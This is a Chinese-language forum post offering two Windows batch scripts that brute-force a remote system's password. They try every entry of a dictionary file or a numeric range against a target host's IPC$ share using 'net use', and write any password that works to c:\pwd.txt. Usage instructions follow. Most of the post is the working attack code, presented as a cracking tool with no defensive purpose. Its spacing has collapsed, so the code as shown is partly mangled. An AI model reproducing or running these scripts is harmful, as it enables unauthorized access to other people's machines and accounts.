bat批处理实现暴力破解系统密码

[复制链接]
查看324 | 回复0 | 2012-4-1 19:14:50 | 显示全部楼层 |阅读模式
原理:
1、字典:for/f%iin(字典文件)donetuse\\主机\ipc$"%i"/user:"用户"
2、数字:for/l%iin(start,step,end)donetuse\\主机\ipc$"%i"/user:"用户"
 
实现:


  将下面文件存为start.bat:
  @echooff
  echo---------------------------------------->>c:\pwd.txt


  date/t>>c:\pwd.txt
  time/t>>c:\pwd.txt
  echo破解结果:>>c:\pwd.txt
  if"%6"=="1"gotoshit2
  :shit1
  start"正在破解....."/mincmd/cfor/f%%iin(%1)docalltest.bat%2"%%i"%3
  gotoquit
  :shit2
  start"正在破解......"/mincmd/cfor/l%%iin(%1,%2,%3)docalltest.bat%4"%%i"%5
  :quit
  将下面文件存为test.bat:
  netuse\\%1\ipc$%2/user:"%3"
  gotoanswer%ERRORLEVEL%
  rem%ERRORLEVEL%

  :answer0
  echo远程主机:"%1">>c:\pwd.txt
  echo用户:"%3">>c:\pwd.txt
  echo密码:%2>>c:\pwd.txt
  netuse\\%1\ipc$/delet
date/t>>c:\pwd.txt
  time/t>>c:\pwd.txt
  echo破解完成。。。。zypcc>>c:\pwd.txt
  exit
  :answer2
 
用法如下:
  1、如果用字典破解:start.bat字典文件路径及名称主机用户名
  2、如果用数字破解:start.bat起始数步长结束数主机用户名1
 
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则